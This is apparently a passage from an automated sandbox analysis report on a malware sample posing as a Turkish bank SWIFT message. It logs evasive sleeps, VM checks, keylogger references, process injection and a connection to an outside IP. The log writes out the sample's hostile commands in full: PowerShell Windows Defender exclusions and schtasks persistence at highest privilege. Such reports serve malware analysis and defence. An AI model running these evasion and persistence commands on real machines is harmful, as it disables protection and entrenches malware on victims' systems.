                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -236652s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -236469s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 4692Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -240000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7380Thread sleep count: 1205 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -239875s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -239715s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -239532s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -239407s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -239277s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -239156s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -239031s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -238919s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -238812s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7380Thread sleep count: 714 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -238697s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -238593s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -238475s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -238359s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -238250s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -238110s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -237969s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -237532s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -236953s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -236672s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -236492s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -236367s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -236157s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7288Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7484Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -14757395258967632s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -240000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -239578s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -237203s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -237093s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -236984s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -236874s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -236765s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -236656s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -236546s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -236433s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -236313s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -236187s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -236077s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -235968s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -235857s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -235743s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -235639s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -235514s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -234291s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -234021s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -233723s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -233482s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -233374s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7968Thread sleep time: -233166s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 7948Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7928Thread sleep time: -4611686018427385s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 3268Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 2060Thread sleep time: -10145709240540247s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 2260Thread sleep count: 8259 > 30
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 2260Thread sleep count: 1592 > 30
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe TID: 792Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe TID: 1732Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe TID: 1732Thread sleep time: -240000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe TID: 1732Thread sleep time: -239781s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\regasms.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Roaming\regasms.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\regasms.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeFile Volume queried: C:\ FullSizeInformation
                  Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 240000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239844Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239703Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239594Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239483Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239375Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239266Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239141Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239010Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238904Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238797Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238677Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238558Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238451Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238294Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238157Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238034Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 237726Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 237367Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 237171Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 237047Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 236932Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 236806Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 236652Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 236469Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 240000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239875Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239715Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239532Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239407Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239277Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239156Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239031Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238919Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238812Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238697Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238593Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238475Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238359Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238250Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238110Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 237969Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 237532Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 236953Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 236672Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 236492Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 236367Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 236157Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 240000
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 239578
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 237203
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 237093
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236984
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236874
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236765
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236656
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236546
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236433
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236313
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236187
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236077
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 235968
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 235857
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 235743
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 235639
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 235514
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 234291
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 234021
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 233723
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 233482
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 233374
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 233166
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeThread delayed: delay time: 240000
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeThread delayed: delay time: 239781
                  Source: rundll32.exe, 00000005.00000002.1365084163.0000022E7961A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1365084163.0000022E795B8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1392563958.0000025438D19000.00000004.00000020.00020000.00000000.sdmp, regasms.exe, 0000001B.00000002.3722145196.00000000012A6000.00000004.00000020.00020000.00000000.sdmp, regasms.exe, 0000001B.00000002.3723916494.0000000001354000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: regasms.exe, 0000001B.00000002.3722145196.00000000012A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                  Source: rundll32.exe, 0000000B.00000002.1392563958.0000025438CB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0{
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\regasms.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\rundll32.exeNetwork Connect: 163.44.198.57 443Jump to behavior
                  .NET source code references suspicious native API functions
                  Source: 13.2.regasms.exe.28be350.0.raw.unpack, Keylogger.csReference to suspicious API methods: MapVirtualKey(vkCode, 0u)
                  Source: 13.2.regasms.exe.28be350.0.raw.unpack, DInvokeCore.csReference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
                  Source: 13.2.regasms.exe.28be350.0.raw.unpack, AntiProcess.csReference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\AppData\Roaming\regasms.exeMemory written: C:\Users\user\AppData\Roaming\regasms.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeMemory written: C:\Users\user\AppData\Roaming\regasms.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeMemory written: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.dqy.dll",#1Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp18B1.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Users\user\AppData\Roaming\regasms.exe "C:\Users\user\AppData\Roaming\regasms.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp2042.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Users\user\AppData\Roaming\regasms.exe "C:\Users\user\AppData\Roaming\regasms.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exitJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD9E2.tmp.bat""Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AtkzppDHiyvcIR" /XML "C:\Users\user\AppData\Local\Temp\tmp9EF.tmp"
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess created: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeProcess created: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe "C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe"
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"' & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\NotepadUpdate.exe "C:\Users\user\AppData\Roaming\NotepadUpdate.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "NotepadUpdate" /tr '"C:\Users\user\AppData\Roaming\NotepadUpdate.exe"'
                  Source: regasms.exe, 0000001B.00000002.3725431578.00000000033F5000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000001B.00000002.3725431578.000000000318B000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000001B.00000002.3725431578.00000000034CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: regasms.exe, 0000001B.00000002.3725431578.00000000033F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`,
                  Source: regasms.exe, 0000001B.00000002.3725431578.000000000318B000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000001B.00000002.3725431578.0000000003196000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000001B.00000002.3725431578.00000000034E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe
                  Source: regasms.exe, 0000001B.00000002.3725431578.000000000318B000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000001B.00000002.3725431578.00000000034CB000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000001B.00000002.3725431578.0000000003196000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\
                  Source: C:\Users\user\AppData\Roaming\regasms.exeQueries volume information: C:\Users\user\AppData\Roaming\regasms.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeQueries volume information: C:\Users\user\AppData\Roaming\regasms.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
